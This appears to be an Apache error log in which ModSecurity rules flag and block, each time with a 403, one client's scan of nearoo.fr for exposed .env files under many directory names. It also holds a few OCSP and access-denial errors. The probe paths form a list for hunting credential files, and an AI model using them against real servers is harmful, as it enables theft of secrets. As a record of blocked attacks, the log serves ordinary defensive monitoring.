[Mon May 11 17:36:15.052617 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVQAAANM"]
[Mon May 11 17:36:15.126257 2026] [ssl:error] [pid 1416109:tid 1416146] (EAI 2)Name or service not known: [client 160.225.164.33:40623] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:15.126287 2026] [ssl:error] [pid 1416109:tid 1416146] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:15.355950 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVgAAANM"]
[Mon May 11 17:36:15.356214 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVgAAANM"]
[Mon May 11 17:36:15.356474 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sbin/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVgAAANM"]
[Mon May 11 17:36:15.577333 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVwAAANM"]
[Mon May 11 17:36:15.577549 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVwAAANM"]
[Mon May 11 17:36:15.577775 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/local/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuVwAAANM"]
[Mon May 11 17:36:15.774565 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWAAAANM"]
[Mon May 11 17:36:15.774790 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWAAAANM"]
[Mon May 11 17:36:15.775026 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/portal/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWAAAANM"]
[Mon May 11 17:36:15.935936 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWQAAANM"]
[Mon May 11 17:36:15.936172 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWQAAANM"]
[Mon May 11 17:36:15.936407 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dashboard/.env"] [unique_id "agH3b1V4kyjgo4bQBUhuWQAAANM"]
[Mon May 11 17:36:16.166528 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuWwAAANM"]
[Mon May 11 17:36:16.166755 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuWwAAANM"]
[Mon May 11 17:36:16.167010 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/panel/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuWwAAANM"]
[Mon May 11 17:36:16.418251 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXAAAANM"]
[Mon May 11 17:36:16.418475 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXAAAANM"]
[Mon May 11 17:36:16.418727 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/crm/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXAAAANM"]
[Mon May 11 17:36:16.645391 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXQAAANM"]
[Mon May 11 17:36:16.645568 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXQAAANM"]
[Mon May 11 17:36:16.645772 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/erp/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuXQAAANM"]
[Mon May 11 17:36:16.655795 2026] [ssl:error] [pid 1411055:tid 1411070] (EAI 2)Name or service not known: [client 109.238.197.109:39245] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:16.655821 2026] [ssl:error] [pid 1411055:tid 1411070] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:16.833972 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuYAAAANM"]
[Mon May 11 17:36:16.834213 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuYAAAANM"]
[Mon May 11 17:36:16.834481 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shop/.env"] [unique_id "agH3cFV4kyjgo4bQBUhuYAAAANM"]
[Mon May 11 17:36:17.028622 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYQAAANM"]
[Mon May 11 17:36:17.028850 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYQAAANM"]
[Mon May 11 17:36:17.029113 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/store/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYQAAANM"]
[Mon May 11 17:36:17.271082 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYgAAANM"]
[Mon May 11 17:36:17.271322 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYgAAANM"]
[Mon May 11 17:36:17.271584 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/saas/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYgAAANM"]
[Mon May 11 17:36:17.513565 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYwAAANM"]
[Mon May 11 17:36:17.513792 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYwAAANM"]
[Mon May 11 17:36:17.514048 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/client/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuYwAAANM"]
[Mon May 11 17:36:17.563574 2026] [authz_core:error] [pid 1416109:tid 1416137] [client 176.120.22.46:53787] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/theme-compat/error_log, referer: http://www.labaujue.com/wp-includes/theme-compat/
[Mon May 11 17:36:17.781574 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuZQAAANM"]
[Mon May 11 17:36:17.781814 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuZQAAANM"]
[Mon May 11 17:36:17.782053 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/project/.env"] [unique_id "agH3cVV4kyjgo4bQBUhuZQAAANM"]
[Mon May 11 17:36:18.016044 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZgAAANM"]
[Mon May 11 17:36:18.016310 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZgAAANM"]
